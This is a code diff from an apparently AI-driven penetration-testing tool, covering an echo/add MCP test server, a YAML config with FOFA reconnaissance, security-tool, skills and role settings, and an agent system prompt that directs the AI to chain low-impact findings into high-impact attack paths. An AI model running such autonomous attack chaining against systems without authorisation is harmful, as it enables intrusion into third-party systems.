||||
type CallToolResponse struct {
|
||||
Content []Content `json:"content"`
|
||||
IsError bool `json:"isError,omitempty"`
|
||||
}
|
||||
|
||||
// Content 内容
|
||||
type Content struct {
|
||||
Type string `json:"type"`
|
||||
Text string `json:"text"`
|
||||
}
|
||||
|
||||
// SSEServer SSE MCP服务器
|
||||
type SSEServer struct {
|
||||
sseClients map[string]chan []byte
|
||||
mu sync.RWMutex
|
||||
}
|
||||
|
||||
func NewSSEServer() *SSEServer {
|
||||
return &SSEServer{
|
||||
sseClients: make(map[string]chan []byte),
|
||||
}
|
||||
}
|
||||
|
||||
// handleSSE 处理SSE连接
|
||||
func (s *SSEServer) handleSSE(w http.ResponseWriter, r *http.Request) {
|
||||
flusher, ok := w.(http.Flusher)
|
||||
if !ok {
|
||||
http.Error(w, "Streaming unsupported", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
w.Header().Set("Content-Type", "text/event-stream")
|
||||
w.Header().Set("Cache-Control", "no-cache")
|
||||
w.Header().Set("Connection", "keep-alive")
|
||||
w.Header().Set("X-Accel-Buffering", "no")
|
||||
|
||||
clientID := uuid.New().String()
|
||||
clientChan := make(chan []byte, 10)
|
||||
|
||||
s.mu.Lock()
|
||||
s.sseClients[clientID] = clientChan
|
||||
s.mu.Unlock()
|
||||
|
||||
defer func() {
|
||||
s.mu.Lock()
|
||||
delete(s.sseClients, clientID)
|
||||
close(clientChan)
|
||||
s.mu.Unlock()
|
||||
}()
|
||||
|
||||
// 发送初始ready事件
|
||||
fmt.Fprintf(w, "event: message\ndata: {\"type\":\"ready\",\"status\":\"ok\"}\n\n")
|
||||
flusher.Flush()
|
||||
|
||||
log.Printf("SSE客户端连接: %s", clientID)
|
||||
|
||||
// 心跳
|
||||
ticker := time.NewTicker(15 * time.Second)
|
||||
defer ticker.Stop()
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-r.Context().Done():
|
||||
log.Printf("SSE客户端断开: %s", clientID)
|
||||
return
|
||||
case msg, ok := <-clientChan:
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
fmt.Fprintf(w, "event: message\ndata: %s\n\n", msg)
|
||||
flusher.Flush()
|
||||
case <-ticker.C:
|
||||
// 心跳
|
||||
fmt.Fprintf(w, ": ping\n\n")
|
||||
flusher.Flush()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// handleMessage 处理POST消息
|
||||
func (s *SSEServer) handleMessage(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method != http.MethodPost {
|
||||
http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
|
||||
return
|
||||
}
|
||||
|
||||
var msg Message
|
||||
if err := json.NewDecoder(r.Body).Decode(&msg); err != nil {
|
||||
http.Error(w, "Invalid JSON", http.StatusBadRequest)
|
||||
return
|
||||
}
|
||||
|
||||
log.Printf("收到请求: method=%s, id=%v", msg.Method, msg.ID)
|
||||
|
||||
// 处理消息
|
||||
response := s.processMessage(&msg)
|
||||
|
||||
// 如果有SSE客户端,通过SSE推送响应
|
||||
if response != nil {
|
||||
responseJSON, _ := json.Marshal(response)
|
||||
s.mu.RLock()
|
||||
// 发送给所有SSE客户端
|
||||
for _, ch := range s.sseClients {
|
||||
select {
|
||||
case ch <- responseJSON:
|
||||
default:
|
||||
}
|
||||
}
|
||||
s.mu.RUnlock()
|
||||
}
|
||||
|
||||
// 也直接返回响应(兼容非SSE模式)
|
||||
if response != nil {
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
json.NewEncoder(w).Encode(response)
|
||||
} else {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
}
|
||||
}
|
||||
|
||||
// processMessage 处理MCP消息
|
||||
func (s *SSEServer) processMessage(msg *Message) *Message {
|
||||
switch msg.Method {
|
||||
case "initialize":
|
||||
return s.handleInitialize(msg)
|
||||
case "tools/list":
|
||||
return s.handleListTools(msg)
|
||||
case "tools/call":
|
||||
return s.handleCallTool(msg)
|
||||
default:
|
||||
return &Message{
|
||||
ID: msg.ID,
|
||||
Version: "2.0",
|
||||
Error: &Error{
|
||||
Code: -32601,
|
||||
Message: "Method not found",
|
||||
},
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// handleInitialize 处理初始化
|
||||
func (s *SSEServer) handleInitialize(msg *Message) *Message {
|
||||
var req InitializeRequest
|
||||
if err := json.Unmarshal(msg.Params, &req); err != nil {
|
||||
return &Message{
|
||||
ID: msg.ID,
|
||||
Version: "2.0",
|
||||
Error: &Error{
|
||||
Code: -32602,
|
||||
Message: "Invalid params",
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
log.Printf("初始化请求: client=%s, version=%s", req.ClientInfo.Name, req.ClientInfo.Version)
|
||||
|
||||
response := InitializeResponse{
|
||||
ProtocolVersion: ProtocolVersion,
|
||||
Capabilities: ServerCapabilities{
|
||||
Tools: map[string]interface{}{
|
||||
"listChanged": true,
|
||||
},
|
||||
},
|
||||
ServerInfo: ServerInfo{
|
||||
Name: "Test SSE MCP Server",
|
||||
Version: "1.0.0",
|
||||
},
|
||||
}
|
||||
|
||||
result, _ := json.Marshal(response)
|
||||
return &Message{
|
||||
ID: msg.ID,
|
||||
Version: "2.0",
|
||||
Result: result,
|
||||
}
|
||||
}
|
||||
|
||||
// handleListTools 处理列出工具
|
||||
func (s *SSEServer) handleListTools(msg *Message) *Message {
|
||||
tools := []Tool{
|
||||
{
|
||||
Name: "test_echo",
|
||||
Description: "回显输入的文本,用于测试SSE MCP服务器",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"text": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "要回显的文本",
|
||||
},
|
||||
},
|
||||
"required": []string{"text"},
|
||||
},
|
||||
},
|
||||
{
|
||||
Name: "test_add",
|
||||
Description: "计算两个数字的和,用于测试SSE MCP服务器",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"a": map[string]interface{}{
|
||||
"type": "number",
|
||||
"description": "第一个数字",
|
||||
},
|
||||
"b": map[string]interface{}{
|
||||
"type": "number",
|
||||
"description": "第二个数字",
|
||||
},
|
||||
},
|
||||
"required": []string{"a", "b"},
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
response := ListToolsResponse{Tools: tools}
|
||||
result, _ := json.Marshal(response)
|
||||
return &Message{
|
||||
ID: msg.ID,
|
||||
Version: "2.0",
|
||||
Result: result,
|
||||
}
|
||||
}
|
||||
|
||||
// handleCallTool 处理工具调用
|
||||
func (s *SSEServer) handleCallTool(msg *Message) *Message {
|
||||
var req CallToolRequest
|
||||
if err := json.Unmarshal(msg.Params, &req); err != nil {
|
||||
return &Message{
|
||||
ID: msg.ID,
|
||||
Version: "2.0",
|
||||
Error: &Error{
|
||||
Code: -32602,
|
||||
Message: "Invalid params",
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
log.Printf("调用工具: name=%s, args=%v", req.Name, req.Arguments)
|
||||
|
||||
var content []Content
|
||||
|
||||
switch req.Name {
|
||||
case "test_echo":
|
||||
text, _ := req.Arguments["text"].(string)
|
||||
content = []Content{
|
||||
{
|
||||
Type: "text",
|
||||
Text: fmt.Sprintf("回显: %s", text),
|
||||
},
|
||||
}
|
||||
case "test_add":
|
||||
var a, b float64
|
||||
if val, ok := req.Arguments["a"].(float64); ok {
|
||||
a = val
|
||||
}
|
||||
if val, ok := req.Arguments["b"].(float64); ok {
|
||||
b = val
|
||||
}
|
||||
sum := a + b
|
||||
content = []Content{
|
||||
{
|
||||
Type: "text",
|
||||
Text: fmt.Sprintf("%.2f + %.2f = %.2f", a, b, sum),
|
||||
},
|
||||
}
|
||||
default:
|
||||
return &Message{
|
||||
ID: msg.ID,
|
||||
Version: "2.0",
|
||||
Error: &Error{
|
||||
Code: -32601,
|
||||
Message: "Tool not found",
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
response := CallToolResponse{
|
||||
Content: content,
|
||||
IsError: false,
|
||||
}
|
||||
|
||||
result, _ := json.Marshal(response)
|
||||
return &Message{
|
||||
ID: msg.ID,
|
||||
Version: "2.0",
|
||||
Result: result,
|
||||
}
|
||||
}
|
||||
|
||||
func main() {
|
||||
server := NewSSEServer()
|
||||
|
||||
http.HandleFunc("/sse", server.handleSSE)
|
||||
http.HandleFunc("/message", server.handleMessage)
|
||||
|
||||
port := ":8082"
|
||||
log.Printf("SSE MCP测试服务器启动在端口 %s", port)
|
||||
log.Printf("SSE端点: http://localhost%s/sse", port)
|
||||
log.Printf("消息端点: http://localhost%s/message", port)
|
||||
log.Printf("配置示例:")
|
||||
log.Printf(`{
|
||||
"test-sse-mcp": {
|
||||
"transport": "sse",
|
||||
"url": "http://127.0.0.1:8082/sse"
|
||||
}
|
||||
}`)
|
||||
|
||||
if err := http.ListenAndServe(port, nil); err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
}
|
||||
|
||||
@@ -5,64 +5,130 @@
|
||||
# 点击右上角"设置"按钮即可修改配置
|
||||
# ============================================
|
||||
|
||||
# ============================================
|
||||
# 系统设置
|
||||
# ============================================
|
||||
|
||||
# 前端显示的版本号(可选,不填则显示默认版本)
|
||||
version: "v1.3.7"
|
||||
|
||||
# 服务器配置
|
||||
server:
|
||||
host: 0.0.0.0 # 监听地址,0.0.0.0 表示监听所有网络接口
|
||||
port: 8080 # HTTP 服务端口,可通过浏览器访问 http://localhost:8080
|
||||
port: 8080 # HTTP 服务端口,可通过浏览器访问 http://localhost:8080
|
||||
|
||||
# 认证配置
|
||||
auth:
|
||||
password: # Web 登录密码,请修改为强密码
|
||||
session_duration_hours: 12 # 登录有效期(小时),超时后需重新登录
|
||||
session_duration_hours: 12 # 登录有效期(小时),超时后需重新登录
|
||||
|
||||
# 日志配置
|
||||
log:
|
||||
level: info # 日志级别: debug(调试), info(信息), warn(警告), error(错误)
|
||||
level: info # 日志级别: debug(调试), info(信息), warn(警告), error(错误)
|
||||
output: stdout # 日志输出位置: stdout(标准输出), stderr(标准错误), 或文件路径
|
||||
|
||||
# ============================================
|
||||
# 对话相关配置
|
||||
# ============================================
|
||||
|
||||
# AI 模型配置(支持 OpenAI 兼容 API)
|
||||
# 必填项:api_key, base_url, model 必须填写才能正常运行
|
||||
# 支持的 API 服务商:
|
||||
# - OpenAI: https://api.openai.com/v1
|
||||
# - DeepSeek: https://api.deepseek.com/v1
|
||||
# - 其他兼容 OpenAI 协议的 API
|
||||
# 常用模型: gpt-4, gpt-3.5-turbo, deepseek-chat, claude-3-opus 等
|
||||
openai:
|
||||
base_url: https://api.deepseek.com/v1 # API 基础 URL(必填)
|
||||
api_key: sk-xxxx # API 密钥(必填)
|
||||
model: deepseek-chat # 模型名称(必填)
|
||||
max_total_tokens: 120000 # LLM 相关上下文的最大 Token 数限制(内存压缩和攻击链构建会共用此配置)
|
||||
|
||||
# ============================================
|
||||
# 信息收集(FOFA)配置(可选)
|
||||
# ============================================
|
||||
# 用于「信息收集」页面调用 FOFA API(后端代理,避免前端暴露 key)
|
||||
# 也可通过环境变量配置:FOFA_EMAIL / FOFA_API_KEY(优先级更高)
|
||||
fofa:
|
||||
base_url: "https://fofa.info/api/v1/search/all" # 可选,留空则使用默认
|
||||
email: "" # FOFA 账号邮箱(可选,建议在系统设置中填写)
|
||||
api_key: "" # FOFA API Key(可选,建议在系统设置中填写)
|
||||
|
||||
# Agent 配置
|
||||
# 达到最大迭代次数时,AI 会自动总结测试结果
|
||||
agent:
|
||||
max_iterations: 120 # 最大迭代次数,AI 代理最多执行多少轮工具调用
|
||||
large_result_threshold: 102400 # 大结果阈值(字节),默认50KB,超过此大小会自动保存到存储
|
||||
result_storage_dir: tmp # 结果存储目录,大结果会保存在此目录下
|
||||
|
||||
# 数据库配置
|
||||
database:
|
||||
path: data/conversations.db # SQLite 数据库文件路径,用于存储对话历史和消息
|
||||
knowledge_db_path: data/knowledge.db # 知识库数据库文件路径(可选,为空则使用会话数据库),用于存储知识库项和向量嵌入,可独立复制和复用
|
||||
|
||||
# ============================================
|
||||
# 任务管理相关配置
|
||||
# ============================================
|
||||
# (配置项已包含在对话相关配置中)
|
||||
|
||||
# ============================================
|
||||
# 漏洞管理相关配置
|
||||
# ============================================
|
||||
|
||||
# 安全工具配置
|
||||
# 系统会从该目录加载所有 .yaml 格式的工具配置文件
|
||||
# 推荐方式:在 tools/ 目录下为每个工具创建独立的配置文件
|
||||
security:
|
||||
tools_dir: tools # 工具配置文件目录(相对于配置文件所在目录)
|
||||
# 工具描述模式:加载 tools 下工具时,暴露给 AI/API 使用的描述来源
|
||||
# short - 优先使用 short_description(简短描述,省 token),为空时用 description
|
||||
# full - 使用 description(详细描述)
|
||||
tool_description_mode: full
|
||||
|
||||
# ============================================
|
||||
# MCP 相关配置
|
||||
# ============================================
|
||||
|
||||
# MCP 协议配置
|
||||
# MCP (Model Context Protocol) 用于工具注册和调用
|
||||
mcp:
|
||||
enabled: false # 是否启用 MCP 服务器(http模式)
|
||||
host: 0.0.0.0 # MCP 服务器监听地址
|
||||
port: 8081 # MCP 服务器端口
|
||||
# AI 模型配置(支持 OpenAI 兼容 API)
|
||||
# 必填项:api_key, base_url, model 必须填写才能正常运行
|
||||
openai:
|
||||
base_url: https://api.deepseek.com/v1 # API 基础 URL(必填)
|
||||
api_key: sk-xxxx # API 密钥(必填)
|
||||
# 支持的 API 服务商:
|
||||
# - OpenAI: https://api.openai.com/v1
|
||||
# - DeepSeek: https://api.deepseek.com/v1
|
||||
# - 其他兼容 OpenAI 协议的 API
|
||||
model: deepseek-chat # 模型名称(必填)
|
||||
max_total_tokens: 120000 # LLM 相关上下文的最大 Token 数限制(内存压缩和攻击链构建会共用此配置)
|
||||
# 常用模型: gpt-4, gpt-3.5-turbo, deepseek-chat, claude-3-opus 等
|
||||
# Agent 配置
|
||||
agent:
|
||||
max_iterations: 120 # 最大迭代次数,AI 代理最多执行多少轮工具调用
|
||||
# 达到最大迭代次数时,AI 会自动总结测试结果
|
||||
large_result_threshold: 102400 # 大结果阈值(字节),默认50KB,超过此大小会自动保存到存储
|
||||
result_storage_dir: tmp # 结果存储目录,大结果会保存在此目录下
|
||||
# 数据库配置
|
||||
database:
|
||||
path: data/conversations.db # SQLite 数据库文件路径,用于存储对话历史和消息
|
||||
knowledge_db_path: data/knowledge.db # 知识库数据库文件路径(可选,为空则使用会话数据库),用于存储知识库项和向量嵌入,可独立复制和复用
|
||||
# 安全工具配置
|
||||
security:
|
||||
tools_dir: tools # 工具配置文件目录(相对于配置文件所在目录)
|
||||
# 系统会从该目录加载所有 .yaml 格式的工具配置文件
|
||||
# 推荐方式:在 tools/ 目录下为每个工具创建独立的配置文件
|
||||
# 外部MCP配置
|
||||
host: 0.0.0.0 # MCP 服务器监听地址
|
||||
port: 8081 # MCP 服务器端口
|
||||
|
||||
# 外部 MCP 配置
|
||||
external_mcp:
|
||||
servers: {}
|
||||
# 知识库配置
|
||||
|
||||
# ============================================
|
||||
# 知识库相关配置
|
||||
# ============================================
|
||||
|
||||
knowledge:
|
||||
enabled: false # 是否启用知识检索功能
|
||||
base_path: knowledge_base # 知识库目录路径(相对于配置文件所在目录)
|
||||
enabled: false # 是否启用知识检索功能
|
||||
base_path: knowledge_base # 知识库目录路径(相对于配置文件所在目录)
|
||||
embedding:
|
||||
provider: openai # 嵌入模型提供商(目前仅支持openai)
|
||||
model: text-embedding-v4 # 嵌入模型名称
|
||||
provider: openai # 嵌入模型提供商(目前仅支持openai)
|
||||
model: text-embedding-v4 # 嵌入模型名称
|
||||
base_url: https://api.deepseek.com/v1 # 留空则使用OpenAI配置的base_url
|
||||
api_key: sk-xxxxxx # 留空则使用OpenAI配置的api_key
|
||||
api_key: sk-xxxxxx # 留空则使用OpenAI配置的api_key
|
||||
retrieval:
|
||||
top_k: 5 # 检索返回的Top-K结果数量
|
||||
similarity_threshold: 0.7 # 相似度阈值(0-1),低于此值的结果将被过滤
|
||||
hybrid_weight: 0.7 # 混合检索权重(0-1),向量检索的权重,1.0表示纯向量检索,0.0表示纯关键词检索
|
||||
top_k: 5 # 检索返回的Top-K结果数量
|
||||
similarity_threshold: 0.7 # 相似度阈值(0-1),低于此值的结果将被过滤
|
||||
hybrid_weight: 0.7 # 混合检索权重(0-1),向量检索的权重,1.0表示纯向量检索,0.0表示纯关键词检索
|
||||
|
||||
# ============================================
|
||||
# Skills 相关配置
|
||||
# ============================================
|
||||
|
||||
# 系统会从该目录加载所有skills,每个skill应是一个目录,包含SKILL.md文件
|
||||
# 例如:skills/sql-injection-testing/SKILL.md
|
||||
skills_dir: skills # Skills配置文件目录(相对于配置文件所在目录)
|
||||
|
||||
# ============================================
|
||||
# 角色相关配置
|
||||
# ============================================
|
||||
|
||||
# 系统会从该目录加载所有 .yaml 格式的角色配置文件
|
||||
# 每个角色应创建独立的配置文件,例如:roles/CTF.yaml, roles/默认.yaml 等
|
||||
roles_dir: roles # 角色配置文件目录(相对于配置文件所在目录)
|
||||
|
||||
@@ -1,11 +1,14 @@
|
||||
module cyberstrike-ai
|
||||
|
||||
go 1.21
|
||||
go 1.23.0
|
||||
|
||||
toolchain go1.24.4
|
||||
|
||||
require (
|
||||
github.com/gin-gonic/gin v1.9.1
|
||||
github.com/google/uuid v1.5.0
|
||||
github.com/mattn/go-sqlite3 v1.14.18
|
||||
github.com/modelcontextprotocol/go-sdk v1.2.0
|
||||
github.com/pkoukk/tiktoken-go v0.1.8
|
||||
go.uber.org/zap v1.26.0
|
||||
gopkg.in/yaml.v3 v3.0.1
|
||||
@@ -21,6 +24,7 @@ require (
|
||||
github.com/go-playground/universal-translator v0.18.1 // indirect
|
||||
github.com/go-playground/validator/v10 v10.14.0 // indirect
|
||||
github.com/goccy/go-json v0.10.2 // indirect
|
||||
github.com/google/jsonschema-go v0.3.0 // indirect
|
||||
github.com/json-iterator/go v1.1.12 // indirect
|
||||
github.com/klauspost/cpuid/v2 v2.2.4 // indirect
|
||||
github.com/leodido/go-urn v1.2.4 // indirect
|
||||
@@ -30,10 +34,12 @@ require (
|
||||
github.com/pelletier/go-toml/v2 v2.0.8 // indirect
|
||||
github.com/twitchyliquid64/golang-asm v0.15.1 // indirect
|
||||
github.com/ugorji/go/codec v1.2.11 // indirect
|
||||
github.com/yosida95/uritemplate/v3 v3.0.2 // indirect
|
||||
go.uber.org/multierr v1.11.0 // indirect
|
||||
golang.org/x/arch v0.3.0 // indirect
|
||||
golang.org/x/crypto v0.14.0 // indirect
|
||||
golang.org/x/net v0.17.0 // indirect
|
||||
golang.org/x/oauth2 v0.30.0 // indirect
|
||||
golang.org/x/sys v0.13.0 // indirect
|
||||
golang.org/x/text v0.13.0 // indirect
|
||||
google.golang.org/protobuf v1.30.0 // indirect
|
||||
|
||||
@@ -25,10 +25,15 @@ github.com/go-playground/validator/v10 v10.14.0 h1:vgvQWe3XCz3gIeFDm/HnTIbj6UGmg
|
||||
github.com/go-playground/validator/v10 v10.14.0/go.mod h1:9iXMNT7sEkjXb0I+enO7QXmzG6QCsPWY4zveKFVRSyU=
|
||||
github.com/goccy/go-json v0.10.2 h1:CrxCmQqYDkv1z7lO7Wbh2HN93uovUHgrECaO5ZrCXAU=
|
||||
github.com/goccy/go-json v0.10.2/go.mod h1:6MelG93GURQebXPDq3khkgXZkazVtN9CRI+MGFi0w8I=
|
||||
github.com/golang-jwt/jwt/v5 v5.2.2 h1:Rl4B7itRWVtYIHFrSNd7vhTiz9UpLdi6gZhZ3wEeDy8=
|
||||
github.com/golang-jwt/jwt/v5 v5.2.2/go.mod h1:pqrtFR0X4osieyHYxtmOUWsAWrfe1Q5UVIyoH402zdk=
|
||||
github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk=
|
||||
github.com/google/go-cmp v0.5.5 h1:Khx7svrCpmxxtHBq5j2mp/xVjsi8hQMfNLvJFAlrGgU=
|
||||
github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
|
||||
github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8=
|
||||
github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU=
|
||||
github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
|
||||
github.com/google/jsonschema-go v0.3.0 h1:6AH2TxVNtk3IlvkkhjrtbUc4S8AvO0Xii0DxIygDg+Q=
|
||||
github.com/google/jsonschema-go v0.3.0/go.mod h1:r5quNTdLOYEz95Ru18zA0ydNbBuYoo9tgaYcxEYhJVE=
|
||||
github.com/google/uuid v1.5.0 h1:1p67kYwdtXjb0gL0BPiP1Av9wiZPo5A8z2cWkTZ+eyU=
|
||||
github.com/google/uuid v1.5.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
|
||||
github.com/json-iterator/go v1.1.12 h1:PV8peI4a0ysnczrg+LtxykD8LfKY9ML6u2jnxaEnrnM=
|
||||
@@ -42,6 +47,8 @@ github.com/mattn/go-isatty v0.0.19 h1:JITubQf0MOLdlGRuRq+jtsDlekdYPia9ZFsB8h/APP
|
||||
github.com/mattn/go-isatty v0.0.19/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
|
||||
github.com/mattn/go-sqlite3 v1.14.18 h1:JL0eqdCOq6DJVNPSvArO/bIV9/P7fbGrV00LZHc+5aI=
|
||||
github.com/mattn/go-sqlite3 v1.14.18/go.mod h1:2eHXhiwb8IkHr+BDWZGa96P6+rkvnG63S2DGjv9HUNg=
|
||||
github.com/modelcontextprotocol/go-sdk v1.2.0 h1:Y23co09300CEk8iZ/tMxIX1dVmKZkzoSBZOpJwUnc/s=
|
||||
github.com/modelcontextprotocol/go-sdk v1.2.0/go.mod h1:6fM3LCm3yV7pAs8isnKLn07oKtB0MP9LHd3DfAcKw10=
|
||||
github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
|
||||
github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd h1:TRLaZ9cD/w8PVh93nsPXa1VrQ6jlwL5oN8l14QlcNfg=
|
||||
github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
|
||||
@@ -68,6 +75,8 @@ github.com/twitchyliquid64/golang-asm v0.15.1 h1:SU5vSMR7hnwNxj24w34ZyCi/FmDZTkS
|
||||
github.com/twitchyliquid64/golang-asm v0.15.1/go.mod h1:a1lVb/DtPvCB8fslRZhAngC2+aY1QWCk3Cedj/Gdt08=
|
||||
github.com/ugorji/go/codec v1.2.11 h1:BMaWp1Bb6fHwEtbplGBGJ498wD+LKlNSl25MjdZY4dU=
|
||||
github.com/ugorji/go/codec v1.2.11/go.mod h1:UNopzCgEMSXjBc6AOMqYvWC1ktqTAfzJZUZgYf6w6lg=
|
||||
github.com/yosida95/uritemplate/v3 v3.0.2 h1:Ed3Oyj9yrmi9087+NczuL5BwkIc4wvTb5zIM+UJPGz4=
|
||||
github.com/yosida95/uritemplate/v3 v3.0.2/go.mod h1:ILOh0sOhIJR3+L/8afwt/kE++YT040gmv5BQTMR2HP4=
|
||||
go.uber.org/goleak v1.2.0 h1:xqgm/S+aQvhWFTtR0XK3Jvg7z8kGV8P4X14IzwN3Eqk=
|
||||
go.uber.org/goleak v1.2.0/go.mod h1:XJYK+MuIchqpmGmUSAzotztawfKvYLUIgg7guXrwVUo=
|
||||
go.uber.org/multierr v1.11.0 h1:blXXJkSxSSfBVBlC76pxqeO+LN3aDfLQo+309xJstO0=
|
||||
@@ -81,13 +90,16 @@ golang.org/x/crypto v0.14.0 h1:wBqGXzWJW6m1XrIKlAH0Hs1JJ7+9KBwnIO8v66Q9cHc=
|
||||
golang.org/x/crypto v0.14.0/go.mod h1:MVFd36DqK4CsrnJYDkBA3VC4m2GkXAM0PvzMCn4JQf4=
|
||||
golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM=
|
||||
golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE=
|
||||
golang.org/x/oauth2 v0.30.0 h1:dnDm7JmhM45NNpd8FDDeLhK6FwqbOf4MLCM9zb1BOHI=
|
||||
golang.org/x/oauth2 v0.30.0/go.mod h1:B++QgG3ZKulg6sRPGD/mqlHQs5rB3Ml9erfeDY7xKlU=
|
||||
golang.org/x/sys v0.0.0-20220704084225-05e143d24a9e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE=
|
||||
golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
|
||||
golang.org/x/text v0.13.0 h1:ablQoSUd0tRdKxZewP80B+BaqeKJuVhuRxj/dkrun3k=
|
||||
golang.org/x/text v0.13.0/go.mod h1:TvPlkZtksWOMsz7fbANvkp4WM8x/WCo/om8BMLbz+aE=
|
||||
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543 h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4=
|
||||
golang.org/x/tools v0.34.0 h1:qIpSLOxeCYGg9TrcJokLBG4KFA6d795g0xkBkiESGlo=
|
||||
golang.org/x/tools v0.34.0/go.mod h1:pAP9OwEaY1CAW3HOmg3hLZC5Z0CCmzjAF2UQMSqNARg=
|
||||
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
|
||||
google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw=
|
||||
google.golang.org/protobuf v1.30.0 h1:kPPoIgf3TsEvrm0PFe15JQ+570QVxYzEvvHqChK+cng=
|
||||
|
||||
|
Before Width: | Height: | Size: 9.0 KiB After Width: | Height: | Size: 9.0 KiB |
|
Before Width: | Height: | Size: 1.8 MiB After Width: | Height: | Size: 1.8 MiB |
|
After Width: | Height: | Size: 832 KiB |
|
After Width: | Height: | Size: 499 KiB |
|
After Width: | Height: | Size: 477 KiB |
|
After Width: | Height: | Size: 839 KiB |
|
After Width: | Height: | Size: 711 KiB |
|
Before Width: | Height: | Size: 317 KiB After Width: | Height: | Size: 317 KiB |
|
After Width: | Height: | Size: 656 KiB |
|
After Width: | Height: | Size: 326 KiB |
|
Before Width: | Height: | Size: 32 KiB After Width: | Height: | Size: 32 KiB |
|
After Width: | Height: | Size: 493 KiB |
|
After Width: | Height: | Size: 598 KiB |
|
Before Width: | Height: | Size: 305 KiB |
|
Before Width: | Height: | Size: 74 KiB |
|
Before Width: | Height: | Size: 335 KiB |
|
Before Width: | Height: | Size: 88 KiB |
|
Before Width: | Height: | Size: 414 KiB |
|
Before Width: | Height: | Size: 246 KiB |
@@ -12,6 +12,7 @@ import (
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/mcp/builtin"
|
||||
"cyberstrike-ai/internal/openai"
|
||||
"cyberstrike-ai/internal/storage"
|
||||
|
||||
@@ -302,16 +303,17 @@ type ProgressCallback func(eventType, message string, data interface{})
|
||||
|
||||
// AgentLoop 执行Agent循环
|
||||
func (a *Agent) AgentLoop(ctx context.Context, userInput string, historyMessages []ChatMessage) (*AgentLoopResult, error) {
|
||||
return a.AgentLoopWithProgress(ctx, userInput, historyMessages, "", nil)
|
||||
return a.AgentLoopWithProgress(ctx, userInput, historyMessages, "", nil, nil, nil)
|
||||
}
|
||||
|
||||
// AgentLoopWithConversationID 执行Agent循环(带对话ID)
|
||||
func (a *Agent) AgentLoopWithConversationID(ctx context.Context, userInput string, historyMessages []ChatMessage, conversationID string) (*AgentLoopResult, error) {
|
||||
return a.AgentLoopWithProgress(ctx, userInput, historyMessages, conversationID, nil)
|
||||
return a.AgentLoopWithProgress(ctx, userInput, historyMessages, conversationID, nil, nil, nil)
|
||||
}
|
||||
|
||||
// AgentLoopWithProgress 执行Agent循环(带进度回调和对话ID)
|
||||
func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, historyMessages []ChatMessage, conversationID string, callback ProgressCallback) (*AgentLoopResult, error) {
|
||||
// roleSkills: 角色配置的skills列表(用于在系统提示词中提示AI,但不硬编码内容)
|
||||
func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, historyMessages []ChatMessage, conversationID string, callback ProgressCallback, roleTools []string, roleSkills []string) (*AgentLoopResult, error) {
|
||||
// 设置当前对话ID
|
||||
a.mu.Lock()
|
||||
a.currentConversationID = conversationID
|
||||
@@ -389,6 +391,17 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
|
||||
- 将低影响问题串联成高影响攻击路径
|
||||
- 牢记:单个高影响漏洞比几十个低严重度更有价值。
|
||||
|
||||
思考与推理要求:
